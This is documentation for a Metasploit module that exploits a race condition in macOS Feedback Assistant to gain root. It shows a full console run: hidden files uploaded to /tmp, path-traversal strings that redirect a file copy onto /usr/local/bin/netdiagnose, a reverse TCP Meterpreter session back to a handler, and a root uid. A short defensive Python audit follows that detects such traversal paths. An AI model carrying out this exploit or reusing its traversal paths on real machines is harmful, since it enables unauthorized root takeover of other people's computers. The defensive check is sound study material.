## Vulnerable Application

This module exploits a race condition in the macOS Feedback Assistant that leads to local
privilege escalation to root.

## Scenarios

```
msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run

[*] Started reverse TCP handler on 172.16.135.1:5555 
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
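Both paths in the `dictionary` entry of the output above begin with one directory but point somewhere else once their `..` components are collapsed. The following is an added defensive example, not part of the module or of Feedback Assistant. It flags paths that pass a raw string-prefix check but fail a check on the normalized path. The `/var/log` and `/tmp` allow-list roots are assumptions chosen for illustration.

```python
import posixpath

# Source -> destination pair copied from the "dictionary" lines in the output above.
SAMPLE_PAIRS = {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/"
    "44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh":
        "/tmp/../../usr/local/bin/netdiagnose",
}

# Hypothetical allow-list roots for this example; not taken from the page.
ALLOWED_SRC = "/var/log"
ALLOWED_DST = "/tmp"


def naive_ok(path, root):
    """Weak form: string-prefix test on the path exactly as supplied."""
    return path.startswith(root + "/")


def normalized_ok(path, root):
    """Collapse '.' and '..' lexically, then compare whole path components."""
    clean = posixpath.normpath(path)
    return posixpath.commonpath([clean, root]) == root


def audit(pairs):
    """Return (raw, normalized) for every path that only the naive check accepts."""
    findings = []
    for src, dst in pairs.items():
        for path, root in ((src, ALLOWED_SRC), (dst, ALLOWED_DST)):
            if naive_ok(path, root) and not normalized_ok(path, root):
                findings.append((path, posixpath.normpath(path)))
    return findings


if __name__ == "__main__":
    for raw, clean in audit(SAMPLE_PAIRS):
        print(f"escapes allow-list: {raw}\n  resolves to: {clean}")
```

Normalization here is purely lexical: it does not resolve symlinks, and a check performed before the file operation cannot by itself close a race between check and use.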
